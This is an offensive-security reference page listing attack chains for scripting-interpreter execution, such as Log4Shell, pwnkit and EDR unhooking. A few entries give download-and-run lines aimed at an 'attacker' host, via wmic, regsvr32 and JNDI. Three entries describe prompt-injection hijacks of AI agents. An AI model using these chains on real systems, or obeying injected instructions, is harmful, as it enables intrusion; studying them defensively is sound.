Command and Scripting Interpreter

§ Where this technique fits

§ Dossiers chaining this technique

• Gatekeeper bypass → unsigned binary execution

  Deliver a payload that strips the com.apple.quarantine xattr (via .dmg with no quarantine attribute or an archive format that doesn't preserve xattrs) — Gatekeeper never prompts.

  step 1 / 5

• PMKID attack → offline crack with no client interaction

  WPA2 PMKID can be extracted from a single association attempt with the AP — no client needed. hcxdumptool + hashcat -m 22000 yields the PSK if it's weak.

  step 2 / 5

• BYOVD → kernel-level disable of EDR callbacks

  From local admin, load a signed-but-vulnerable driver. Use its kernel primitive to walk the EDR's PsSetCreateProcessNotifyRoutine entries and unlink them — EDR stops receiving events while still 'running'.

  step 3 / 5

• Apache Struts S2-045 (CVE-2017-5638) → Equifax-style breach

  Crafted Content-Type header is parsed as OGNL — execute commands as the app user. The 2017 Equifax breach origin: unpatched Struts endpoint exposed to the internet.

  step 3 / 5

• EternalBlue (MS17-010) → SMBv1 wormable spread

  Unpatched Windows 7 / Server 2008 with SMBv1 enabled — pre-auth kernel RCE. Used by WannaCry / NotPetya in 2017, still found on enclave / industrial networks.

  step 3 / 5

• wmic + XSL → AppLocker / SRP bypass

  wmic os get /format:'http://attacker/x.xsl' renders the result by fetching attacker XSL. The XSL contains JScript blocks — runs in wmic's signed-binary context, bypasses allowlisting.

  step 3 / 4

• F5 BIG-IP iControl auth bypass (CVE-2022-1388) → root on LB

  Connection-header smuggle bypasses iControl REST auth, command-injection RCE as root. Load balancers see all traffic — recover TLS keys, session cookies, internal SSO config.

  step 3 / 6

• ESXiArgs — OpenSLP unauth RCE → ransomware

  Internet-facing ESXi with SLP service on TCP/427 unpatched for CVE-2021-21974. Single ROP gadget chain yields root, then a small bash script encrypts every .vmdk on local datastores.

  step 3 / 6

• FortiGate SSL-VPN pre-auth RCE → config theft

  Pre-auth heap overflow / format-string against FortiGate sslvpnd grants root on the appliance. Pull the running config, decrypt stored RADIUS / LDAP / VPN-user secrets.

  step 3 / 6

• PJL / PostScript → printer root → quiet network foothold

  PRET-style payloads against TCP/9100 give RCE on the printer's controller. The printer is a stable, EDR-free Linux box trusted by the rest of the network — perfect long-term implant.

  step 3 / 6

• polkit pwnkit (CVE-2021-4034) → instant root

  Pre-2022 pkexec has a heap-overflow exploitable with no special permissions. Compile / drop the exploit, run as low-priv user, gain root.

  step 3 / 5

• Self-hosted runner takeover → persistent CI compromise

  A public repo with self-hosted GitHub runners accepts external PRs. First malicious PR runs on the runner; the workflow drops a runner-hook that fires before every future job.

  step 3 / 6

• AlwaysInstallElevated → SYSTEM via MSI

  Both HKCU and HKLM AlwaysInstallElevated policies set to 1 — any user-installed MSI runs as SYSTEM. Drop a malicious MSI and install it.

  step 3 / 5

• UAC bypass → elevated admin on a workstation

  Standard medium-integrity admin user runs fodhelper / silentcleanup / computerdefaults auto-elevate bypass — gets a high-integrity session without a UAC prompt.

  step 3 / 5

• Squiblydoo: regsvr32 → remote SCT execution

  regsvr32.exe /s /n /u /i:http://attacker/x.sct scrobj.dll. AppLocker / SRP often allow regsvr32 because it's signed Microsoft — attacker JS runs in its context.

  step 4 / 5

• certutil + bitsadmin → AV-friendly stager chain

  Initial access dropped a tiny .bat. It uses certutil to decode a base64 blob and bitsadmin to fetch the real beacon, then schtasks for persistence. Every binary is signed Microsoft.

  step 4 / 6

• Rowhammer → bit flip → in-browser sandbox escape

  JavaScript hammers adjacent DRAM rows for tens of seconds; an unlucky-for-defender bit flip in a page-table entry hands the attacker a write primitive into another mapping. RIDL-class chain to native code.

  step 4 / 6

• Exposed UART → root shell → firmware extraction

  Open the IoT device, locate TX/RX/GND pads, attach a USB-UART, get an unauthenticated root prompt, dump firmware for offline analysis + 0-day hunting.

  step 4 / 6

• USB drop in parking lot → HID payload → C2

  Drop branded-looking USB sticks near the target site. An employee plugs one in; a Rubber-Ducky-class HID device types a PowerShell payload that connects out to attacker C2.

  step 4 / 6

• Jenkins /script Groovy console → RCE → AD

  Jenkins script console exposed unauth on the corporate intranet — Groovy 'execute()' = RCE as the Jenkins service account, often a domain user with broad agent access.

  step 4 / 6

• Service account → SYSTEM via named-pipe impersonation

  Service-context shell has SeImpersonatePrivilege. Use Potato-family tools (Juicy / Rogue / Print / God) to coerce SYSTEM to authenticate to an attacker-controlled named pipe, then impersonate the token.

  step 4 / 5

• SUID binary → root via GTFOBins

  Find an unusual SUID binary (find / nmap / vim / awk / less), check GTFOBins for the privilege-escalation primitive, spawn a root shell.

  step 4 / 5

• Dependency confusion → internal CI compromise

  Publish a public npm package with the name of a target's private internal dependency at a higher version. CI resolves the public one first and runs install scripts in privileged CI.

  step 4 / 5

• sudo NOPASSWD on a shell-spawner → root

  User has sudo NOPASSWD on a binary that can shell out (vi, less, awk, perl, python). Use the binary's escape sequence to drop into a root shell.

  step 4 / 5

• DnsAdmins membership → SYSTEM on the DC

  DnsAdmins members can load a DLL via the DNS service ServerLevelPluginDll registry value — the service runs as SYSTEM on the DC.

  step 4 / 5

• WSUS over HTTP → push code to managed clients

  Clients using an HTTP WSUS server can be MITM'd to receive an attacker-signed (but Microsoft-trusted) auxiliary update that executes arbitrary commands as SYSTEM.

  step 4 / 4

• Multi-agent confused-deputy → tool-call escalation

  User-facing agent has limited tools; back-end planning agent has powerful tools (shell, file system). Prompt injection in user input → user agent → back-end agent. The back-end runs the attacker's intent under the planner's higher trust.

  step 5 / 6

• io_uring UAF → modprobe_path overwrite → root

  Use an io_uring UAF to land arbitrary kernel write, repoint /proc/sys/kernel/modprobe to an attacker binary, then trigger a kernel auto-modprobe — runs the binary as root.

  step 5 / 6

• Process doppelgänging → spawn signed image with attacker bytes

  Use NTFS transactional file APIs to overlay an attacker image during process creation. The final mapped process differs from the on-disk file — AV sees only the legit signed image at scan time.

  step 5 / 6

• Spring4Shell (CVE-2022-22965) → JSP webshell on Tomcat

  Send a crafted POST that uses Spring's data-binding to mutate Tomcat's logging configuration — turn its access log into a JSP file written under webapps/, then request it.

  step 5 / 6

• Log4Shell (CVE-2021-44228) → RCE → lateral

  Send `${jndi:ldap://attacker/x}` in any logged field (User-Agent / X-Forwarded-For). Vulnerable log4j 2.x resolves the JNDI URL, fetches a Java class from attacker LDAP, runs it as the app user.

  step 5 / 6

• WebView XSS → JS bridge → native code exec

  WebView loads partially-attacker-controlled content (e.g. injected referral param) and exposes addJavascriptInterface — XSS in the page calls the bridge to run app-level code.

  step 5 / 5

• Agent goal hijack via web search

  An autonomous agent searches the web and reads tool output. Attacker SEO-poisons / posts a comment that, when fetched, contains 'NEW INSTRUCTION:' the agent obediently follows.

  step 5 / 5

• Prompt injection → tool-call shell RCE

  Coding-assistant agent has a 'run command' tool. Hidden prompt in a README inside a project triggers `rm -rf` or fetches a reverse shell when the developer asks for help.

  step 5 / 5

• Java deserialization → ysoserial → RCE

  An endpoint deserializes a Java object from user-controlled bytes. ysoserial produces a gadget chain whose readObject() reaches Runtime.exec().

  step 5 / 6

• Server-side prototype pollution → auth bypass → RCE

  Merge / clone helper on user input pollutes Object.prototype. A later code path reads `isAdmin` from a fresh object and gets true — then a child-process gadget reaches RCE.

  step 5 / 5

• MSSQL linked-server crawl → cross-host RCE

  Linked-server trust chains in MSSQL let a low-priv login execute as a higher-priv login on a remote SQL host — and pivot recursively across the estate.

  step 5 / 6

• GPO write rights → Immediate scheduled task → SYSTEM on OU

  GenericWrite on a linked GPO (or write rights to its SYSVOL folder) lets you drop a ScheduledTasks.xml that fires as SYSTEM on every machine in the OU at the next gpupdate.

  step 5 / 5

• nf_tables UAF → kernel R/W → root

  CVE-2024-1086-class nf_tables UAF reachable from a user namespace. Win the race with userfaultfd to land an attacker object in the freed slot, build a kernel R/W primitive, overwrite the current task's cred struct.

  step 6 / 7

• Compromised vendor mailbox → reply-chain phishing → client compromise

  Take over a vendor / partner mailbox via AITM phishing. Reply to an existing thread with a malicious link — trust transferred from the genuine prior conversation defeats most user training.

  step 6 / 6

• SSTI (Jinja2) → sandbox escape → RCE

  User input rendered as a Jinja2 template instead of escaped. Escape the sandbox via __class__.__mro__ to reach subprocess and execute commands.

  step 6 / 6

• SCCM site takeover via NTLM relay (Takeover-1)

  Coerce the SCCM site server to authenticate, relay to MSSQL on the site database, and grant yourself Full Administrator inside SCCM.

  step 7 / 7

§ What commonly comes next

1. 01
   LSASS via procdump / comsvcs.dll

   W-LSASS-PROCDUMP · Credential Access
   seen 4×
2. 02
   Unsecured Credentials

   T1552 · Credential Access
   seen 3×
3. 03
   Valid Accounts

   T1078 · Initial Access
   seen 3×
4. 04
   LSASS Memory

   T1003.001 · Credential Access
   seen 2×
5. 05
   Scheduled Task Hijack

   W-SCHEDTASK-HIJACK · Persistence
   seen 2×
6. 06
   AlwaysInstallElevated

   W-ALWAYS-ELEVATE · Privilege Escalation
   seen 1×
7. 07
   Application Layer Protocol

   T1071 · Command and Control
   seen 1×
8. 08
   Brute Force

   T1110 · Credential Access
   seen 1×